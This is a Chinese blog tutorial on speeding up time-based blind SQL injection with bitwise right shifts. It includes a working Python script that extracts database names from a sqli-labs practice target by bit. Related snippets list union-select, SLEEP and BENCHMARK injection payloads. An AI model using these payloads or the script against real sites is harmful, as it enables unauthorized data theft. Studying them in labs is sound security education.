利用位运算符号提高延时注入效率

最新推荐文章于 2024-07-22 15:15:29 发布
最新推荐文章于 2024-07-22 15:15:29 发布
阅读量159 收藏
点赞数 2
文章标签: python web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44747030/article/details/131156146
版权

利用位运算符号提高延时注入效率

前置知识

右移位运算符是将一个二进制数按指定移动的位数向右移动。右位移: 将一个运算对象的各二进制位全部右移若干位, 正数左补0, 负数左补1, 右边多余的位数去掉; 右移 1 位相当于除 2, 右移 n 位相当于除 2 的 n 次方.如下例所示:

MariaDB [test]> select ascii(b'01110011');
ERROR 2006 (HY000): Server has gone away
No connection. Trying to reconnect...
Connection id:    32
Current database: test

+--------------------+
| ascii(b'01110011') |
+--------------------+
|                115 |
+--------------------+
1 row in set (0.007 sec)

MariaDB [test]> select ascii(b'01110011') >> 1;
+-------------------------+
| ascii(b'01110011') >> 1 |
+-------------------------+
|                      57 |
+-------------------------+
1 row in set (0.000 sec)

MariaDB [test]> select ascii(b'01110011') >> 7;
+-------------------------+
| ascii(b'01110011') >> 7 |
+-------------------------+
|                       0 |
+-------------------------+
1 row in set (0.000 sec)

MariaDB [test]> select ascii(b'01110011') >> 6;
+-------------------------+
| ascii(b'01110011') >> 6 |
+-------------------------+
|                       1 |
+-------------------------+
1 row in set (0.000 sec)

MariaDB [test]> select ascii(b'01110011') >> 5;
+-------------------------+
| ascii(b'01110011') >> 5 |
+-------------------------+
|                       3 |
+-------------------------+
1 row in set (0.000 sec)

MariaDB [test]> select ascii(b'01110011') >> 0;
+-------------------------+
| ascii(b'01110011') >> 0 |
+-------------------------+
|                     115 |
+-------------------------+
1 row in set (0.000 sec)

利用这种方式,我们可以将单个的字符,先转换成ascii,在转换成二进制位,通过右位移的方式来对每个二进制位进行比较0或者1,通过8次的对比就可以获取到相应的二进制位,在通过二进制位计算出ascii值并转换成字符既可以得到相应的结果。

# -*- coding:utf-8 -*-

import requests
import time

def bitOperation(url,delay):
    result = ""  # 存储获取的查询结果
    url_bak = url
    # 外层循环由查询结果字符的长度控制,内层循环即为固定的7次位运算
    for len in range(1, 777):  # 此处长度可控,也可以不做判断直接给一个很长的数字
        char = '0'  # 设置当前字符的ascii码二进制的第一位默认为0,因为是正数
        for i in range(7, -1,-1):
            url = url.format(len, i, int(char + '0', 2))  # int(char + '0', 2) 解释为二进制表示,并将其转换为对应的整数。表示假设其第二位为0,若相等即条件为真,否则为假
            start_time = time.time()  # 记录请求开始时间
            r1 = requests.get(url)  # 发送第一个请求
            end_time = time.time()  # 记录请求结束时间
            elapsed_time = end_time - start_time  # 计算请求延时时间

            if elapsed_time > delay:
                char += '0'
                print('进入0:', char)
            else:
                char += '1'
                print('进入1:', char)
            url = url_bak
        # 二进制转换成十进制,也就是ascii码(chr() 函数将该整数视为 ASCII 码值,并将其转换为对应的字符),再将ascii码转换成字符累加到result变量上
        result += chr(int(char, 2))
        print(result)
        if int(char, 2) == 0:  # 不再作判断长度, 当ascii码为00000000时自动退出(多发7个请求)
            print("已超过此次查询字符串的长度,自动停止")
            return result
        if int(char, 2) == 127: # ascii最多127个,127为del
            print("查询内容不存在或语法错误...")
            return result
    return result


def main():
    url = "http://192.168.91.129/Less-5/?id=1' and (select if ((ascii((substr(database(),{},1))) >> {} )={} ,sleep(3), 'false'))-- -"
    delay = 2
    bitOperation(url,delay)


if __name__ == "__main__":
    main()

在这里插入图片描述

参考文章:

https://xz.aliyun.com/t/9302#toc-3

https://www.exploit-db.com/papers/17073

https://xz.aliyun.com/t/3054

evilxpl
关注
  • 2
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
Web系统常见安全漏洞介绍及解决方案-sql注入
web15286201346的博客
07-31 887
使用ORM框架对sql注入是有积极意义的,在实际解决SQL注入时,还有一个难点就是应用复杂后,代码数量庞大,难以把可能存在sql注入的地方不遗漏的找出来,而ORM框架为我们发现问题提供了一个便捷的途径。这个探测方法有若干变体,例如,发送';例如,如果应用程序根据用户的输入(如用户名和密码)来查询用户帐户的数据库表,以认证用户,而攻击者能够将恶意数据注入查询的用户名部分(和/或密码部分),查询便可能更改成完全不同的数据复制查询,可能是修改数据库的查询,或在数据库服务器上运行Shell命令的查询。...
mysql10种报错注入,SQL注入
weixin_39738273的博客
03-23 286
转自:https://wywwzjj.top/2018/11/02/Sqli-labs-通关记录/#函数报错信息注入MySQL 常用语句备忘-- Default DatabasesmysqlRequires root privilegesinformation_schemaAvailable from version 5 and higherComment Out Query# /**/ -- -...
SQL注入
qq_39480875的博客
05-22 236
转自:https://wywwzjj.top/2018/11/02/Sqli-labs-通关记录/#函数报错信息注入 MySQL 常用语句备忘 -- Default Databases mysql Requires root privileges information_schema Available from version 5 and higher Comment Out Que...
渗透测试-注入攻击专题
aming小老弟
03-11 2057
sql手工注入 @apache+php+Mysql 正则注入 0x01 Mysql 手工注入 1.1 联合注入 ?id=1' order by 4--+ ?id=0' union select 1,2,3,database()--+ ?id=0' union select 1,2,3,group_concat(table_name) from information_schema.tables where table_schema=database() --+ ?id=0' union sele
SQL注入类型
01-27 6107
SQL注入类型详解 SQL 注入是指web应用程序对用户输入数据控制不严格,导致用户输入数据被拼接到SQL语句中被数据库执行导致的安全问题,按照注入方式可以分为联合注入、布尔盲注、时间盲注、堆叠注入以及报错注入等五种注入方式。在sql注入时影响返回单行的不仅仅是sql 语句的问题,有时是代码层面的问题。 判断注入是否存在 and 1=1,and 1=2 返回页面数据不同 ?id=3-1,返回数据内容不同 添加’、""以及其他特殊符报错 联合注入 前提要求:数据会进行回显,页面有显位符,在一个在
sql注入总结--详细
weixin_44576725的博客
11-19 5831
文章目录SQL注入总结1、原理2、数据库基础系统函数字符串连接函数mysql注释符union 操作符的介绍order by介绍字符串编码数据库结构导入导出相关操作增删改函数3、判断是否存在SQL注入4、回显注入(联合注入)查询字段数目查询库名查询表名查询字段名查询字段值获取WebShell5、盲注sql注入截取字符串常用函数REGEXP正则表达式LIKE 匹配布尔盲注布尔盲注的流程脚本时间盲注DNSLog盲注6、堆叠注入7、报错注入数据溢出xpath语法错误主键重复一些特性8、二次注入9、ORDER BY
SQL 注入漏洞
2301_82218779的博客
05-30 1569
什么是 SQL 注入SQL 注入是一种常见的网络安全漏洞和攻击方式,它利用应用程序对用户输入数据的处理不当,使得攻击者能够在执行 SQL 查询时插入恶意的 SQL 代码。通过成功注入恶意代码,攻击者可以执行未经授权的数据库操作,获取敏感信息、篡改数据甚至完全破坏数据库危害。
渗透测试 ( 6 ) --- SQL 注入神器 sqlmap
freeking101的博客
07-03 8134
SQL 注入 SQL注入就是通过把 SQL 命令插入到 Web表单提交 或 输入域名 或 页面URL请求查询的字符串,最终达到欺骗服务器执行恶意的 SQL命令,假如管理员没有对 id 参数进行过滤那么黑客可以通过数据传输点将恶意的SQL语句带入查询。 sqlmap sqlmap 是一个开源的渗透测试工具,可以用来自动化的检测,利用SQL注入漏洞,获取数据库服务器的权限。它具有功能强大的检测引擎,针对各种不同类型数据库的渗透测试的功能选项,包括获取数据库中存储的数据,访问操作系统文件甚至可以通过外带数据
SQL专栏之常见注入备忘
HWHXY的博客
01-26 1460
layout: post title: SQL专栏 category: Vulnerability_mining tags: SQL keywords: mysql,注入 前言 xxxxx 开始 分类 先对sql注入的类型进行分类,大体我分为两类,一类是能够直观的看到数据库返回的信息,另一类是不能直观的看到,但是能够通过数据库执行的语句产生的信息不对称推测出信息。前者可以分为union、报错,后者分为时间、布 尔注入。期间会穿插放入一些小ticks,为了更有效率的接触数据库。 1 union注入 1.1 .
利用TDR (时域反射计)测量传输延时
01-20
摘要:随着时钟速率的提高利用高速示波器有源探头测量延时的传统方法很难获得准确结果。这些探头成为高速信通路的一部分,并造成被测信的失真,引入误差。探头还必须直接置于器件引脚,以消除PCB (印刷电路板)...
延时加载JavaScript代码提高速度
10-23
主要介绍了延时加载JavaScript代码提高速度的相关资料,需要的朋友可以参考下
运算放大器制作的延时电路
07-29
在本文中,我们将深入探讨如何利用运算放大器构建延时电路,特别是关注TAA865和TCA335A这两款特定型的运放。 首先,我们来看TAA865运放制作的260秒延时电路。这种电路设计的目标是在电源接通时立即触发继电器,...
如何提高单片机程序执行效率
07-14
为了避免使用延时,可以使用定时器中断产生一个标志位,到了时间标志位置1,在主程序里面只需要检测标志位,置1了才执行一次,然后清标志。其他时间就去做别的事了,而不会在这等待了。最好的例子就是数码管的显示,...
EDA/PLD中的利用EDA工具提高系统级芯片测试的效率
11-08
在电子设计自动化(EDA)和可编程逻辑器件(PLD)领域,利用EDA工具提高系统级芯片测试效率是一项至关重要的任务。系统级芯片(SoC)设计的复杂性不断提升,面临高可靠性的要求、高质量的标准、成本控制的压力以及...
Python如何将字符串连接在一起并使用`join()`方法】
qq_36253366的博客
07-19 421
方法是字符串对象的方法,而不是列表或元组等序列类型的方法。因此,你需要先指定一个用作分隔符的字符串,然后调用这个字符串的。方法将字符串连接在一起,你需要首先确保这些字符串被存储在一个序列类型中(如列表或元组),然后调用这个序列的。方法是一个字符串方法,它用于将序列(如列表、元组等)中的元素以指定的字符连接生成一个新的字符串。列表中的所有字符串元素使用空格作为分隔符连接成一个新的字符串。方法,并将你想要作为分隔符的字符串作为参数传递给。方法,并将包含要连接字符串的序列作为参数传递。
【影刀】自动化办公介绍与RPA机器人实例
最新发布
weixin_44195690的博客
07-22 162
影刀RPA是杭州分叉智能科技有限公司开发的一款自动化办公软件。它是基于Machine Behavior Learning(机器行为学习)技术,为各行业提供行为自动化办公机器人。
Python 中的内存管理有哪些优缺点】
qq_36253366的博客
07-19 418
Python中的内存管理是一个复杂而高效的系统,它通过自动化和抽象化的方式极大地简化了程序员的内存管理负担,但同时也存在一些潜在的缺点。
批量下载网易云音乐歌单的Python脚本
qq_43580271的博客
07-17 1307
同时,这也展示了如何利用Python在日常生活中解决实际问题的能力,希望这个小技巧对你有所帮助!
延时注入的payload有哪些
07-11
延时注入(Delay-Based SQL Injection)是一种攻击技术,利用数据库查询中的延时函数来实现注入恶意代码。以下是一些常见的延时注入Payload示例: 1. 基于`SLEEP()`函数的延时注入: ``` ' OR SLEEP(5)# ``` 上述Payload将在查询中引入一个条件,如果条件成立,将会执行`SLEEP(5)`函数,导致查询延时5秒钟。 2. 基于`BENCHMARK()`函数的延时注入: ``` ' OR BENCHMARK(1000000,SHA1('test'))# ``` 上述Payload将在查询中引入一个条件,如果条件成立,将会执行100万次SHA1哈希计算,导致查询延时较长时间。 请注意,在实际应用中,延时注入是一种严重的安全漏洞,请务必对输入参数进行严格的验证和过滤,以避免这种类型的攻击。同时,及时更新和修补数据库系统,以确保安全性。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值